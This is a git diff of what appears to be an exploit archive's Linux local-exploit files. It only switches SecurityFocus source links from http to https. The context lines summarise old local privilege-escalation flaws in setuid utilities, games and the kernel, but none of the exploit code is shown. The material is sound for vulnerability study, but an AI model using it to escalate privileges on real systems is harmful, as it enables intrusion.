+1,4 @@ -source: http://www.securityfocus.com/bid/7760/info +source: https://www.securityfocus.com/bid/7760/info A vulnerability has been discovered in the Linux /bin/mail utility. The problem occurs when processing excessive data within the carbon copy field. Due to insufficient bounds checking while parsing this information it may be possible to trigger a buffer overrun. diff --git a/exploits/linux/local/22703.c b/exploits/linux/local/22703.c index 5412bc39f..cace8ce8e 100644 --- a/exploits/linux/local/22703.c +++ b/exploits/linux/local/22703.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7773/info +// source: https://www.securityfocus.com/bid/7773/info Xmame is prone to a locally exploitable buffer overflow. This is due to insufficient bounds checking of the command line parameter used to specify language settings (--lang). Successful exploitation on some systems could result in execution of malicious instructions with elevated privileges. diff --git a/exploits/linux/local/22719.pl b/exploits/linux/local/22719.pl index 55f2f621d..569d0d2c8 100755 --- a/exploits/linux/local/22719.pl +++ b/exploits/linux/local/22719.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7790/info +source: https://www.securityfocus.com/bid/7790/info A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system. diff --git a/exploits/linux/local/22720.c b/exploits/linux/local/22720.c index d99d58a4a..eeea4b184 100644 --- a/exploits/linux/local/22720.c +++ b/exploits/linux/local/22720.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7790/info +// source: https://www.securityfocus.com/bid/7790/info A buffer overflow vulnerability has been reported for the kon2 utility shipped with various Linux distributions. Exploitation of this vulnerability may result in a local attacker obtaining elevated privileges on a vulnerable system. diff --git a/exploits/linux/local/22729.c b/exploits/linux/local/22729.c index 9f2104115..c99f510e1 100644 --- a/exploits/linux/local/22729.c +++ b/exploits/linux/local/22729.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7812/info +// source: https://www.securityfocus.com/bid/7812/info A vulnerability has been reported in the man utility. The problem is said to occur due to a format string bug when handling a catalog file. As a result, an attacker may be capable of writing arbitrary values to sensitive locations within process memory. diff --git a/exploits/linux/local/22745.c b/exploits/linux/local/22745.c index 8594fa2b8..aa38d3431 100644 --- a/exploits/linux/local/22745.c +++ b/exploits/linux/local/22745.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7836/info +// source: https://www.securityfocus.com/bid/7836/info A vulnerability has been reported for zblast, an svgalib-based game. The problem occurs when copying data from a user-supplied environment variable into a static memory buffer. By storing excessive data within the variable, it may be possible for an attacker to corrupt process memory, ultimately resulting in the execution of arbitrary code. diff --git a/exploits/linux/local/22748.c b/exploits/linux/local/22748.c index 5f9b7eacd..41fcb132b 100644 --- a/exploits/linux/local/22748.c +++ b/exploits/linux/local/22748.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7838/info +source: https://www.securityfocus.com/bid/7838/info It has been reported that Xaos is vulnerable to a boundary condition error in the command option processing. Because of this, an attacker may be able to gain elevated privileges, potentially compromising the integrity of the host. */ diff --git a/exploits/linux/local/22768.pl b/exploits/linux/local/22768.pl index 3a8d5725e..90fd17eb3 100755 --- a/exploits/linux/local/22768.pl +++ b/exploits/linux/local/22768.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7902/info +source: https://www.securityfocus.com/bid/7902/info atftp is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient bounds checking performed on input supplied to the command line parameter (-t) for "timeout". diff --git a/exploits/linux/local/22773.c b/exploits/linux/local/22773.c index 5f7a58510..03b33812e 100644 --- a/exploits/linux/local/22773.c +++ b/exploits/linux/local/22773.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7916/info +// source: https://www.securityfocus.com/bid/7916/info It has been reported that Progress database does not properly handle untrusted input when opening shared libraries. Specifically, the dlopen() function used by several Progress utilities checks the user's PATH environment variable when including shared object libraries. If any shared objects are found, Progress will load and execute them. Due to this, an attacker may be able to gain unauthorized privileges. diff --git a/exploits/linux/local/22775.txt b/exploits/linux/local/22775.txt index d6a3284dd..404b2af2a 100644 --- a/exploits/linux/local/22775.txt +++ b/exploits/linux/local/22775.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7918/info +source: https://www.securityfocus.com/bid/7918/info A vulnerability has been reported for FreeWnn that may result in an attacker obtaining elevated privileges. diff --git a/exploits/linux/local/22781.txt b/exploits/linux/local/22781.txt index f40ac88a2..eeaeec2c6 100644 --- a/exploits/linux/local/22781.txt +++ b/exploits/linux/local/22781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7929/info +source: https://www.securityfocus.com/bid/7929/info A vulnerability has been discovered in the Linux-Pam pam_wheel module. The problem exists in the way the module authenticates users under certain configurations. Specifically, if the module is configured to allow wheel group members to use the 'su' utility without supplying credentials and is not configured to verify the user's UID, it may be possible for a local attacker to elevated privileges. diff --git a/exploits/linux/local/22806.sh b/exploits/linux/local/22806.sh index 68e997108..50f0e6692 100755 --- a/exploits/linux/local/22806.sh +++ b/exploits/linux/local/22806.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7977/info +source: https://www.securityfocus.com/bid/7977/info sdfingerd has been reported prone to a local privilege escalation vulnerability. The issue presents itself because the sdfingerd daemon fails to sufficiently drop group privileges before executing commands that are contained in a users .plan file. diff --git a/exploits/linux/local/22813.c b/exploits/linux/local/22813.c index 5964665c9..8759a565d 100644 --- a/exploits/linux/local/22813.c +++ b/exploits/linux/local/22813.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8002/info +source: https://www.securityfocus.com/bid/8002/info A potential information disclosure vulnerability has been reported for the Linux /proc filesystem, specifically when invoking setuid applications. As a result, an unprivileged user may be able to read the contents of a setuid application's environment data. This could potentially, although unlikely, result in the disclosure of sensitive information, such as restricted file path information. */ diff --git a/exploits/linux/local/22815.c b/exploits/linux/local/22815.c index fd7fb9c71..850df5f96 100644 --- a/exploits/linux/local/22815.c +++ b/exploits/linux/local/22815.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8005/info +// source: https://www.securityfocus.com/bid/8005/info It has been reported that GNATS is prone to a buffer overflow condition when parsing certain environment variables. diff --git a/exploits/linux/local/22836.pl b/exploits/linux/local/22836.pl index 1714d3093..98257f82d 100755 --- a/exploits/linux/local/22836.pl +++ b/exploits/linux/local/22836.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8030/info +source: https://www.securityfocus.com/bid/8030/info A buffer overrun has been discovered in Elm. The problem occurs due to insufficient bounds checking performed before copying user-supplied data into an internal memory buffer. Specifically, a TERM environment variable containing excessive data would cause a buffer within Elm to be overrun. diff --git a/exploits/linux/local/22840.c b/exploits/linux/local/22840.c index aea2ffd17..d095e1def 100644 --- a/exploits/linux/local/22840.c +++ b/exploits/linux/local/22840.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8042/info +source: https://www.securityfocus.com/bid/8042/info A race condition vulnerability has been discovered in the Linux execve() system call, affecting the 2.4 kernel tree. The problem lies in the atomicity of placing a target executables file descriptor within the current process descriptor and executing the file. diff --git a/exploits/linux/local/22847.txt b/exploits/linux/local/22847.txt index 089aab4ef..ff5cfd432 100644 --- a/exploits/linux/local/22847.txt +++ b/exploits/linux/local/22847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8070/info +source: https://www.securityfocus.com/bid/8070/info It has been reported that the permissions set by default on the files and directories comprising InterSystems Cache are insecure. The permissions on directories allegedly allow for any user to overwrite any file. This creates many opportunities for local attackers to obtain root privileges. diff --git a/exploits/linux/local/22860.c b/exploits/linux/local/22860.c index d46a3924e..9d9be3ca9 100644 --- a/exploits/linux/local/22860.c +++ b/exploits/linux/local/22860.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8097/info +// source: https://www.securityfocus.com/bid/8097/info A local buffer overflow has been reported for GNU Chess that may result in an attacker obtaining elevated privileges. diff --git a/exploits/linux/local/22861.c b/exploits/linux/local/22861.c index 8b7b225db..9676ada06 100644 --- a/exploits/linux/local/22861.c +++ b/exploits/linux/local/22861.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8099/info +// source: https://www.securityfocus.com/bid/8099/info A local buffer overflow has been reported for GNU an that may result in an attacker potentially obtaining elevated privileges. diff --git a/exploits/linux/local/22862.c b/exploits/linux/local/22862.c index 37d94337a..2d9c85266 100644 --- a/exploits/linux/local/22862.c +++ b/exploits/linux/local/22862.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8100/info +// source: https://www.securityfocus.com/bid/8100/info isdnrep has been reported prone to a local command line argument buffer overflow vulnerability. diff --git a/exploits/linux/local/22863.c b/exploits/linux/local/22863.c index 8d9ae824c..1e3a9c594 100644 --- a/exploits/linux/local/22863.c +++ b/exploits/linux/local/22863.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8100/info +// source: https://www.securityfocus.com/bid/8100/info isdnrep has been reported prone to a local command line argument buffer overflow vulnerability. diff --git a/exploits/linux/local/22884.c b/exploits/linux/local/22884.c index 67459e105..4bd30a46a 100644 --- a/exploits/linux/local/22884.c +++ b/exploits/linux/local/22884.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8132/info +// source: https://www.securityfocus.com/bid/8132/info A problem with the software may make elevation of privileges possible. diff --git a/exploits/linux/local/22943.c b/exploits/linux/local/22943.c index eb5a80c4e..5283fce36 100644 --- a/exploits/linux/local/22943.c +++ b/exploits/linux/local/22943.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8239/info +// source: https://www.securityfocus.com/bid/8239/info A buffer overflow condition has been reported in top when handling environment variables of excessive length. This may result in an attacker potentially executing arbitrary code. diff --git a/exploits/linux/local/22965.c b/exploits/linux/local/22965.c index 05260fc4e..8721ef580 100644 --- a/exploits/linux/local/22965.c +++ b/exploits/linux/local/22965.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8296/info +// source: https://www.securityfocus.com/bid/8296/info XBlast is contains a locally exploitable buffer overflow vulnerability due to insufficient bounds checking of data supplied via the HOME environment variable. Successful exploitation would allow a local user to execute code with a gid of games. diff --git a/exploits/linux/local/22971.txt b/exploits/linux/local/22971.txt index d6fa0d60d..5fdc843e4 100644 --- a/exploits/linux/local/22971.txt +++ b/exploits/linux/local/22971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8303/info +source: https://www.securityfocus.com/bid/8303/info The mandb utility has been reported to be affected by multiple local buffer overflow vulnerabilities. diff --git a/exploits/linux/local/22979.txt b/exploits/linux/local/22979.txt index f08dbded0..1eb66add7 100644 --- a/exploits/linux/local/22979.txt +++ b/exploits/linux/local/22979.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8328/info +source: https://www.securityfocus.com/bid/8328/info It has been reported that the rscsi utility may provide for the modification of ownership and the corruption of arbitrary attacker specified files. diff --git a/exploits/linux/local/22984.c b/exploits/linux/local/22984.c index 8ce5509b0..f5517b8a9 100644 --- a/exploits/linux/local/22984.c +++ b/exploits/linux/local/22984.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8337/info +// source: https://www.securityfocus.com/bid/8337/info xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. @@ -8,7 +8,7 @@ The software is typically installed setgid 'games'. by: v9[v9@fakehalo.deadpig.org]. (fakehalo) exploits an overflow missed in the patch/upgrade of: - http://www.securityfocus.com/bid/8312 + https://www.securityfocus.com/bid/8312 fix: xtama_score.c:132: +strncpy(name,nickname,sizeof(name)-1); diff --git a/exploits/linux/local/22985.c b/exploits/linux/local/22985.c index 9dbbcbec9..2a851e795 100644 --- a/exploits/linux/local/22985.c +++ b/exploits/linux/local/22985.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8337/info +// source: https://www.securityfocus.com/bid/8337/info xtokkaetama is prone to a locally exploitable buffer overflow vulnerability. This is due to insufficient bounds checking of the '-nickname' command line option, which could result in execution of arbitrary code in the context of the software. diff --git a/exploits/linux/local/22993.txt b/exploits/linux/local/22993.txt index 548e70af7..8cb05c5c1 100644 --- a/exploits/linux/local/22993.txt +++ b/exploits/linux/local/22993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8365/info +source: https://www.securityfocus.com/bid/8365/info It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance. diff --git a/exploits/linux/local/22996.c b/exploits/linux/local/22996.c index ca4d5b9d1..ac4d3669a 100644 --- a/exploits/linux/local/22996.c +++ b/exploits/linux/local/22996.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8370/info +// source: https://www.securityfocus.com/bid/8370/info A problem in the handling of long strings in environment variables by xpcd may result in a buffer overflow condition. This may allow an attacker to gain unauthorized access to system resources. diff --git a/exploits/linux/local/23045.pl b/exploits/linux/local/23045.pl index 85041671c..735707dbd 100755 --- a/exploits/linux/local/23045.pl +++ b/exploits/linux/local/23045.pl @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/8462/info +#source: https://www.securityfocus.com/bid/8462/info # #Various potential security vulnerabilities have been reported for ViRobot Linux Server. Problems are said to occur within various setuid binaries installed by the program. Reports indicate that some of these binaries may be prone to buffer overruns, potentially making them exploitable to execute arbitrary code with elevated privileges. diff --git a/exploits/linux/local/23119.c b/exploits/linux/local/23119.c index 2133c7c9f..34e27b847 100644 --- a/exploits/linux/local/23119.c +++ b/exploits/linux/local/23119.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8561/info +// source: https://www.securityfocus.com/bid/8561/info It has been discovered that Apache::Gallery, when using Inline C, stores shared libraries in an insecure fashion. As a result, an attacker may be capable of having malicious code linked into the Apache process. This could lead to a malicious local user gaining the privileges of the user invoking the Apache process, typically user nobody. It should be noted that for a successful exploitation, the libraries must be replaced prior to the Apache process being invoked. diff --git a/exploits/linux/local/23126.c b/exploits/linux/local/23126.c index 4ac4beef5..61fbb0a53 100644 --- a/exploits/linux/local/23126.c +++ b/exploits/linux/local/23126.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8571/info +// source: https://www.securityfocus.com/bid/8571/info The configuration files for the RealOne Player are installed in the a hidden folder in a users home directory. The issue presents itself, because configuration files stored in this directory are installed with insecure permissions. This means that an attacker, who is in the same group as a target user, may modify RealOne Player configuration files and may thereby escalate privileges to that of the target user. diff --git a/exploits/linux/local/23168.pl b/exploits/linux/local/23168.pl index cfa092e8b..5ca9aa200 100755 --- a/exploits/linux/local/23168.pl +++ b/exploits/linux/local/23168.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8675/info +source: https://www.securityfocus.com/bid/8675/info A vulnerability has been reported in man that may allow an attacker to gain elevated privileges. The problem lies in man failing to carry out sufficient sanity checks before executing a user-defined compression program. As a result, it may be possible for an attacker to execute arbitrary code with user 'man' privileges. diff --git a/exploits/linux/local/23189.c b/exploits/linux/local/23189.c index df8868515..d34c99a1e 100644 --- a/exploits/linux/local/23189.c +++ b/exploits/linux/local/23189.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8710/info +// source: https://www.securityfocus.com/bid/8710/info A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23197.c b/exploits/linux/local/23197.c index c8ddf881c..c4c0347e8 100644 --- a/exploits/linux/local/23197.c +++ b/exploits/linux/local/23197.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8729/info +// source: https://www.securityfocus.com/bid/8729/info A problem in the handling of large requests supplied with certain flags has been reported in Maj-Jong. Because of this, it may be possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23204.c b/exploits/linux/local/23204.c index 7d654f766..136be4dca 100644 --- a/exploits/linux/local/23204.c +++ b/exploits/linux/local/23204.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8736/info +// source: https://www.securityfocus.com/bid/8736/info A local buffer overrun vulnerability has been reported for Silly Poker. The problem occurs due to insufficient bounds checking when handling user-supplied data. As a result, an attacker may be capable of controlling the execution flow of the sillypoker program and effectivley executing arbitrary code with elevated privileges. diff --git a/exploits/linux/local/23223.c b/exploits/linux/local/23223.c index 1b2e03e40..3456202d9 100644 --- a/exploits/linux/local/23223.c +++ b/exploits/linux/local/23223.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8778/info +// source: https://www.securityfocus.com/bid/8778/info A problem exists in the SuSEWM configuration file used by SuSEConfig. Because of this, it may be possible for a local attacker to gain elevated privileges. diff --git a/exploits/linux/local/23228.c b/exploits/linux/local/23228.c index d72640e78..51709dfb1 100644 --- a/exploits/linux/local/23228.c +++ b/exploits/linux/local/23228.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8780/info +// source: https://www.securityfocus.com/bid/8780/info It has been reported that a local off-by-one heap overflow exists in the handling of user-supplied databases by slocate. Because of this, an attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23258.c b/exploits/linux/local/23258.c index 784df7c6e..43a7320f1 100644 --- a/exploits/linux/local/23258.c +++ b/exploits/linux/local/23258.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8844/info +// source: https://www.securityfocus.com/bid/8844/info Oracle Database Server 'oracle' binary has been reported prone to a local buffer overflow vulnerability. diff --git a/exploits/linux/local/23297.c b/exploits/linux/local/23297.c index c0ca2985c..1875c3197 100644 --- a/exploits/linux/local/23297.c +++ b/exploits/linux/local/23297.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8899/info +// source: https://www.securityfocus.com/bid/8899/info A vulnerability has been reported for Musicqueue. The problem specifically occurs within a signal handling procedure used invoked when a segmentation violation occurs. The procedure invokes a library function, passing it the name of a predictable filename to create within the systems temporary directory. As a result, an attacker may be capable of launching a symbolic link attack, effectively overwriting the contents of a potentially system critical file with the contents of the created file. diff --git a/exploits/linux/local/23299.c b/exploits/linux/local/23299.c index fccc7259f..b4054a8b5 100644 --- a/exploits/linux/local/23299.c +++ b/exploits/linux/local/23299.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23300.c b/exploits/linux/local/23300.c index 54410c188..6711a0871 100644 --- a/exploits/linux/local/23300.c +++ b/exploits/linux/local/23300.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23301.c b/exploits/linux/local/23301.c index 2a28b22b1..52934c599 100644 --- a/exploits/linux/local/23301.c +++ b/exploits/linux/local/23301.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8901/info +// source: https://www.securityfocus.com/bid/8901/info A problem has been identified in the iwconfig program when handling strings on the commandline. Because of this, a local attacker may be able to gain elevated privileges. diff --git a/exploits/linux/local/23303.c b/exploits/linux/local/23303.c index 8d44e7426..89c929c87 100644 --- a/exploits/linux/local/23303.c +++ b/exploits/linux/local/23303.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8903/info +// source: https://www.securityfocus.com/bid/8903/info Multiple buffer overrun vulnerabilities have been discovered in Musicqueue. Both issues stem from the lack of bounds checking when passing user-supplied input to the sprintf() libc function. As a result, it may be possible for an attacker to exploit arbitrary code with the privileges the affected application, possibly installed suid or sgid. diff --git a/exploits/linux/local/23308.c b/exploits/linux/local/23308.c index 50f46de90..fabf5f281 100644 --- a/exploits/linux/local/23308.c +++ b/exploits/linux/local/23308.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8915/info +// source: https://www.securityfocus.com/bid/8915/info It has been alleged that it is possible for local attackers to gain root privileges through kpopup, which is is installed setuid root by default. According to the report, kpopup uses the system(3) C-library function insecurely to run other utilities on the system. In at least one instance, system(3) is called to invoke the binary killall(1) in a manner relying on the PATH environment variable. As the environment can be set by the unprivileged user when kpopup is executed, an arbitrary executable with the filename killall(1) can be executed. Many modern shells anticipate insecure use of this function by setuid/setgid processes and drop effective privileges if they do not match the real userid/gid of the process. It may be the case that kpopup first sets its real uid and gid to 0 before calling system, making this vulnerability exploitable. This has not been confirmed by Symantec. diff --git a/exploits/linux/local/23344.txt b/exploits/linux/local/23344.txt index 7f871bd37..d97d7aa93 100644 --- a/exploits/linux/local/23344.txt +++ b/exploits/linux/local/23344.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23345.txt b/exploits/linux/local/23345.txt index 2d67ad871..861f02414 100644 --- a/exploits/linux/local/23345.txt +++ b/exploits/linux/local/23345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23346.txt b/exploits/linux/local/23346.txt index b802b685d..4e1fdaf66 100644 --- a/exploits/linux/local/23346.txt +++ b/exploits/linux/local/23346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8989/info +source: https://www.securityfocus.com/bid/8989/info Multiple command-line parameter format string vulnerabilities have been discovered in various IBM DB2 binaries. Specifically, format-based functions are implemented erroneously within the db2govd, db2start, and db2stop programs. These binaries are typically installed setuid. As a result, a malicious local user may be capable of gaining elevate privileges. diff --git a/exploits/linux/local/23350.c b/exploits/linux/local/23350.c index e89c42015..065a370c3 100644 --- a/exploits/linux/local/23350.c +++ b/exploits/linux/local/23350.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23351.c b/exploits/linux/local/23351.c index 84e09c702..1c78e2214 100644 --- a/exploits/linux/local/23351.c +++ b/exploits/linux/local/23351.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23352.c b/exploits/linux/local/23352.c index 5bc117f36..c3ec71964 100644 --- a/exploits/linux/local/23352.c +++ b/exploits/linux/local/23352.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8993/info +// source: https://www.securityfocus.com/bid/8993/info It has been reported that TerminatorX may be prone to multiple vulnerabilities when handling command-line and environment variable data. As a result, an attacker may be capable of exploiting the application in a variety of ways to execute arbitrary code with elevated privileges. It should be noted that TerminatorX is not installed setuid by default, however the author recommends that users make the application setuid root. diff --git a/exploits/linux/local/23364.sh b/exploits/linux/local/23364.sh index 30b149f1a..34c7263d9 100755 --- a/exploits/linux/local/23364.sh +++ b/exploits/linux/local/23364.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8995/info +source: https://www.securityfocus.com/bid/8995/info wmapm has been reported prone to a local privilege escalation vulnerability. The vulnerability has been conjectured to result from a lack of relative path usage while the vulnerable dock app is invoking a third party binary. As a result of this, a local attacker may manipulate local path settings and have the setuid wmapm dock app erroneously invoke a trojan binary that is located in a directory that the attacker has permissions to write to. diff --git a/exploits/linux/local/23414.txt b/exploits/linux/local/23414.txt index ae508917d..17e5743cf 100644 --- a/exploits/linux/local/23414.txt +++ b/exploits/linux/local/23414.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9161/info +source: https://www.securityfocus.com/bid/9161/info It has been reported that FVWM may be prone to a command execution vulnerability that may allow an attacker to execute malicious commands on a vulnerable system. It has been reported that the fvwm-menu-directory component does not properly sanitize user input and allows a user with write permissions to a directory to execute arbitrary commands. diff --git a/exploits/linux/local/23479.sh b/exploits/linux/local/23479.sh index dffc6de25..af05bae70 100755 --- a/exploits/linux/local/23479.sh +++ b/exploits/linux/local/23479.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9297/info +source: https://www.securityfocus.com/bid/9297/info It has been reported that GNU Indent may be prone to a local heap overflow vulnerability that can be exploited through a malicious C source input file. It has been reported that indent copies data from the file to a 1000 byte long buffer without sufficient boundary checking. A heap overflow condition can be triggered, which may result in memory being overwritten and, ultimately, malicious code execution with the privileges of the user running indent. diff --git a/exploits/linux/local/23481.c b/exploits/linux/local/23481.c index d21ba099a..336738a80 100644 --- a/exploits/linux/local/23481.c +++ b/exploits/linux/local/23481.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9302/info +// source: https://www.securityfocus.com/bid/9302/info Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. diff --git a/exploits/linux/local/23482.c b/exploits/linux/local/23482.c index 89ec2adfe..a5e31d736 100644 --- a/exploits/linux/local/23482.c +++ b/exploits/linux/local/23482.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9302/info +// source: https://www.securityfocus.com/bid/9302/info Reportedly, the Apache mod_php module may be prone to a vulnerability that may allow a local attacker to gain access to privileged file descriptors. As a result, the attacker may pose as a legitimate server and possibly steal or manipulate sensitive information. diff --git a/exploits/linux/local/23510.c b/exploits/linux/local/23510.c index 9c78b17e7..f35dd855d 100644 --- a/exploits/linux/local/23510.c +++ b/exploits/linux/local/23510.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9341/info +// source: https://www.securityfocus.com/bid/9341/info xsok is prone to a locally exploitable buffer overrun vulnerability due to insufficient bounds check of data supplied through the LANG environment variable. This could be exploited to execute arbitrary code with elevated privileges. The program is typically installed setgid games. diff --git a/exploits/linux/local/23581.pl b/exploits/linux/local/23581.pl index b9fa1950e..7c214be01 100755 --- a/exploits/linux/local/23581.pl +++ b/exploits/linux/local/23581.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9471/info +source: https://www.securityfocus.com/bid/9471/info A vulnerability has been reported to exist in the Apache mod_perl module that may allow local attackers to gain access to privileged file descriptors. This issue could be exploited by an attacker to hijack a vulnerable server daemon. Other attacks are also possible. diff --git a/exploits/linux/local/23634.c b/exploits/linux/local/23634.c index 92c3f1942..ca9a7833b 100644 --- a/exploits/linux/local/23634.c +++ b/exploits/linux/local/23634.c @@ -1,4 +1,4 @@ -// source: http://www.securityfocus.com/bid/9550/info +// source: https://www.securityfocus.com/bid/9550/info // The 0verkill game client has been reported prone to multiple instances of exploitable buffer overrun vulnerabilities. The functions that have been reported to be affected are load_cfg(), save_cfg() and send_message(). It has been reported that due to a lack of sufficient boundary checks performed on user supplied data, an attacker may exploit the issues to execute arbitrary instructions in the security context of the Overkill game client. diff --git a/exploits/linux/local/23658.c b/exploits/linux/local/23658.c index 05fa81097..f602f741e 100644 --- a/exploits/linux/local/23658.c +++ b/exploits/linux/local/23658.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9596/info +source: https://www.securityfocus.com/bid/9596/info VServer is reported prone to a breakout vulnerability that allows a malicious user to escape from the context of the chrooted root directory of the virtual server. This issue is due to the VServer application failing to secure itself against a "chroot-again" style vulnerability. Successful exploitation of this issue may allow an attacker to gain access to the filesystem outside of the chrooted root directory. */ diff --git a/exploits/linux/local/23674.txt b/exploits/linux/local/23674.txt index 99633fe1e..29eb4a5c4 100644 --- a/exploits/linux/local/23674.txt +++ b/exploits/linux/local/23674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9619/info +source: https://www.securityfocus.com/bid/9619/info A local privilege escalation vulnerability has been reported to affect the 2.6 Linux kernel. diff --git a/exploits/linux/local/23682.c b/exploits/linux/local/23682.c index b6ab84854..ca9372d9f 100644 --- a/exploits/linux/local/23682.c +++ b/exploits/linux/local/23682.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9636/info +// source: https://www.securityfocus.com/bid/9636/info It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system. diff --git a/exploits/linux/local/23738.c b/exploits/linux/local/23738.c index 1b12d1244..d48d29f3a 100644 --- a/exploits/linux/local/23738.c +++ b/exploits/linux/local/23738.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/9712/info +source: https://www.securityfocus.com/bid/9712/info Multiple buffer overflow vulnerabilities exist in the environment variable handling of LBreakout2. The issue is due to an insufficient boundary checking of certain environment variables used by the affected application. diff --git a/exploits/linux/local/23743.txt 